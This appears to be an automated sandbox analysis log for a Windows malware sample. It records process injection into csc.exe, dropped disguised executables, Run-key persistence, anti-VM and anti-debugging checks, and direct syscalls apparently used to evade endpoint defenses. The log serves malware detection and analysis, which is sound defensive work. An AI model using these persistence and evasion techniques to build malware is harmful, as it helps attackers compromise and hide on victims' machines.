                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 3.2.csc.exe.8036e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.9880000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3993975930.0000000007FB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5776, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424366 push eax; ret 0_2_00424374
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424376 push eax; ret 0_2_0042439C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041DAB0 push 3B185E89h; ret 0_2_0041DAB9
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00428B3F push ecx; ret 0_2_00428B4F
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041CE1E push esp; ret 0_2_0041CE29
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00427E30 push eax; ret 0_2_00427E4E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097072D1 push ebp; retf 3_2_0970737D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF4249 push es; ret 3_2_06AF4274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF416A push es; retf 3_2_06AF4248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF416A push es; ret 3_2_06AF4274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF3E99 push es; retf 3_2_06AF3EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF08F0 push es; ret 3_2_06AF0900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF0861 push es; ret 3_2_06AF0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF0841 push es; ret 3_2_06AF0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0DDB pushfd ; retf 3_2_095E0DDC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0D91 push 8B000001h; iretd 3_2_095E0D96
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0FDA pushad ; retf 3_2_095E0FDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0E24 push esp; retf 3_2_095E0E25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0ED5 push esp; retf 3_2_095E0ED6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E7AF5 push edx; retf 3_2_095E7AF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0993E2F0 push esp; ret 3_2_0993E2F1
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, IvWVBqISSAu8Lo1NXyU.csHigh entropy of concatenated method names: 'DgEIDqGKIZ', 'OWxDSrCh4etLMjhOKoG', 'T0vkkXCcJHoNqSdKNqu', 'CmEIRyy3Z3', 'uesI8d2uji', 'Ed0I5J3HRg', 'OcZIbC10tS', 'siYIJQbnPQ', 'i17IfYLvQY', 'd6KIsYxvPI'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csHigh entropy of concatenated method names: 'EdlfqAAxSq4asn4s2Ne', 'l9FwaFAwKMsJskM5SS2', 'ULWX35OtJK', 'vh0ry9Sq2v', 'FPeXBKLIcd', 'gl7X7GxgH4', 'sOAXXtNN9T', 'M2TXNQ9Hv1', 'QDRaBUYlQe', 'BxWBkkZ0es'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.csHigh entropy of concatenated method names: 'qetesG9p96', 'WDkeVsRr8A', 'SlKe22d1Hb', 'KZEe9PDBHk', 'MqMeR1vtlb', 'Syye8sGlPk', 'PKgeUBiWbF', 'WluNQUBMUd', 'XWwe10yo0k', 'JJNei3SGMf'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csHigh entropy of concatenated method names: 'r1Wrl3iRT', 'F0Hj71PkP', 'ofu4PJmtE', 'dXlGX6NO4', 'ru7tII8RS', 'BJQPgbJ6f', 'jdWsRrDML', 'LsESFMgvB', 'PRHHNfsKZ', 'ibg5oNNrj'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, Ayn1bJ1VAOfw54fj8a.csHigh entropy of concatenated method names: 'gkPDTUQCf', 'd8wM3uvWR', 'SVSKAXtte', 'BpJofeCoO', 'jAlqc9L96', 'XNvZSnYtA', 'dnmvgT4pw', 'tkHp8QKmC', 'GTEO2Zu9jUdXRAfVFcE', 'iAphh7uRxLmOm9iSnyw'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, JdSXlyd2vhHvwQ3xmP9.csHigh entropy of concatenated method names: 'LVMdUEHCB6', 'ePDD9PCMjolGyjHyym1', 'EEE4ciCKSDP0VRUno9A', 'TPwdDPtMck', 'pcE7iBCq38kxBF6jxgM', 'mQDxf6CZjc8JCTEf5m5', 'KNJdRASXDY', 'axud8TWJFp', 't70YaOC1YUNwMOdWkSu', 'tAuSjKCiyyXug0mA74c'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, rUXBNkX62kIkdWvG3y1.csHigh entropy of concatenated method names: 'd4FX55NwX2', 'yLdXbyXX6F', 'cnwXJ0RfcX', 'eFLXfxHWyS', 'beAXsiuwgI', 'vitXVELxpD', 'oNVX2tS0EE', 'FpCX9bvyoE', 'HiFXR5l6Um', 'FHsX8OCiPO'
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeFile created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yjfesx.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00422CCA IsIconic,GetWindowPlacement,GetWindowRect,0_2_00422CCA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5776, type: MEMORYSTR
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 584000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 544546Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeDropped PE file which has not been started: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeDropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeAPI coverage: 0.3 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4400Thread sleep count: 197 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5268Thread sleep time: -584000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -544546s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe TID: 1020Thread sleep count: 168 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe TID: 1020Thread sleep time: -84000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0042407C VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0042407C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 584000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 544546Jump to behavior
                      Source: csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, yjfesx.exe, 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, HardDiskSentinelBin.exe.5.drBinary or memory string: /COMPAQEMU
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: csc.exe, 00000003.00000002.3995042682.0000000009B87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllredI

                      Anti Debugging

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSystem information queried: KernelDebuggerInformationJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x7FF8C88ED6C4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateKey: Direct from: 0x7FF8C88ED3A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenSection: Direct from: 0x7FF8C88ED6E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtProtectVirtualMemory: Direct from: 0x7FF8C88EDA04Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationThread: Direct from: 0x7FF8C88ED1A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationFile: Direct from: 0x7FF8C88ED4E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryValueKey: Direct from: 0x7FF8C88ED2E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtResumeThread: Direct from: 0x7FF8C88EDA44Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueueApcThread: Direct from: 0x7FF8C88ED8A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryAttributesFile: Direct from: 0x7FF8C88ED7A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateFile: Direct from: 0x7FF8C88EDAA4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenKeyEx: Direct from: 0x7FF8C88EF3F4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtNotifyChangeKey: Direct from: 0x7FF8C88EF314Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x7FF8C88C4B5EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x76EE63E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetTimerEx: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetValueKey: Direct from: 0x7FF8C88EDBF4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtEnumerateValueKey: Direct from: 0x7FF8C88ED264Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationProcess: Direct from: 0x7FF8C88ED384Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateThreadEx: Direct from: 0x7FF8C88EE814Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtAllocateVirtualMemory: Direct from: 0x7FF8C88ED304Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtEnumerateKey: Direct from: 0x7FF8C88ED644Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryInformationToken: Direct from: 0x7FF8C88ED424Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtUnmapViewOfSection: Direct from: 0x7FF8C88ED544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryInformationProcess: Direct from: 0x7FF8C88ED324Jump to behavior
